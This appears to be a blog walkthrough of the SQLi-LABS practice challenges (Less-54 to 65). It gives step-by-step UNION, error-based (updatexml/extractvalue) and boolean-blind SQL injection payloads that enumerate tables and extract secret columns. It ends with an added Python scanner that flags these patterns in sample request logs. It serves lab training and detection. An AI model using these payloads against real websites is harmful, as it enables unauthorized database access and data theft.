SQLi-LABS Page-4(Challenges)

Posted by Michae1


Less-54 GET - challenge - Union - 10 queries allowed - Variation 1

GET, union injection, variation

?id=1'       // abnormal display

?id=1'%23   // displays normally, so the parameter is probably closed by a single quote '

?id=1' order by 3%23    // displays normally

?id=1' order by 4%23    // abnormal, so the UNION injection has three displayable columns

?id=-1' union select 1,2,3%23   // id has to be set to -1 for the UNION that follows to run

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23   // table name

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='avnx1khkg5'%23   // column names

?id=-1' union select 1,group_concat(concat_ws(0x7e,id,sessid,secret_HUW2,tryy)),3 from avnx1khkg5%23

 

Less-55

?id=1'       // abnormal display

?id=1'%23   // abnormal

?id=1)%23  // normal

?id=-1) union select 1,2,3%23

For the remaining steps, replace the single quote with a closing parenthesis; everything else is the same as Less-54.

Less-56

?id=1')%23

?id=-1') union select 1,2,3%23

Less-57

?id=1'   // normal

?id=1"    // abnormal

?id=1"%23  // normal

?id=-1" union select 1,2,3%23

Less-58  error-based injection

extractvalue(1,concat(0x7e,(select database())))

updatexml(1,concat(0x7e,(select database())),1)

?id=1'

Source statement

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

Error

''1'' LIMIT 0,1'

Broken down (spacing added):   '   '   1'   '   LIMIT 0,1'

Only now do I understand the structure of this error.

The outermost quotes belong to the error message itself; 1' is the parameter we entered; the quotes wrapping 1' are the single quotes from the source statement.

?id=1'%23

Displays normally.

Database name

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23

Table name

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Column names

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='us0lety19j'),0x7e),1)%23

Column contents (last chance, be quick)

It seems not all columns came out.

?id=1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,id,sessid,secret_A32O,tryy)) from us0lety19j),0x7e),1)%23

Less-59

?id=1'

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Less-60

?id=1"

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Less-61

?id=1'

?id=1')) and updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Less-62

?id=1') and 1=1%23     // displays normally

?id=1') and 1=2%23     // abnormal

?id=1') and length(database())=11%23   // abnormal

?id=1') and length(database())=10%23   // normal, so the database name is 10 characters long

?id=1') and (select count(table_name) from information_schema.tables where table_schema=database())=1%23   // number of tables

?id=1') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=10%23   // length of the table name

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=97%23   // table name

?id=1') and (select count(column_name) from information_schema.columns where table_name='ahopefr76d')=4%23   // number of columns

?id=1') and ascii(substr((select column_name from information_schema.columns where table_name='ahopefr76d' limit 0,1),1,1))=105%23  // column name

?id=1') and length((select secret_6XV7 from ahopefr76d))=24%23    // length of the column contents

?id=1') and ascii(substr((select secret_6XV7 from ahopefr76d),1,1))=110%23   // column contents

The statements for Less-63, 64 and 65 that follow are the same; only the closing characters differ.
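Added example, not part of the original post: a small Python scanner that URL-decodes the query string of each request line and flags the technique families this walkthrough exercises (UNION, error-based updatexml/extractvalue, boolean-blind ascii/length probes, information_schema enumeration, comment truncation). The log lines and the rule names are constructed for the demo and are not lab output.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (method, path, status), not real traffic;
# the paths reuse the probe shapes from the walkthrough above.
SAMPLE_LOG = """\
GET /Less-54/?id=1 200
GET /Less-54/?id=-1'%20union%20select%201,2,3%23 200
GET /Less-58/?id=1'%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)%23 200
GET /Less-62/?id=1')%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=97%23 200
GET /Less-54/?id=2 200
"""

# (rule name, regex) pairs applied to the URL-decoded, lower-cased query string.
# Rule names are my own labels, one per technique used in the walkthrough.
RULES = [
    ("union-based",   re.compile(r"\bunion\b.*\bselect\b")),
    ("error-based",   re.compile(r"\b(updatexml|extractvalue)\s*\(")),
    ("boolean-blind", re.compile(r"\b(ascii|length)\s*\(")),
    ("schema-enum",   re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("comment-trunc", re.compile(r"(#|--\s|/\*)")),
]

def decode_query(path: str) -> str:
    """URL-decode the query part of a request path ('' when there is none)."""
    _, _, query = path.partition("?")
    return unquote_plus(query)

def classify(path: str) -> list[str]:
    """Names of every rule the decoded query string trips, in RULES order."""
    q = decode_query(path).lower()
    return [name for name, rx in RULES if rx.search(q)]

def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """(path, matched rule names) for each request line that trips a rule."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue                # malformed line: skip rather than crash
        matched = classify(fields[1])
        if matched:
            hits.append((fields[1], matched))
    return hits

if __name__ == "__main__":
    for path, names in scan_log(SAMPLE_LOG):
        print(",".join(names), path)
```

The `%23` at the end of each probe decodes to `#`, which is why the comment-truncation rule fires on every injected line but not on the plain `?id=1` requests.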
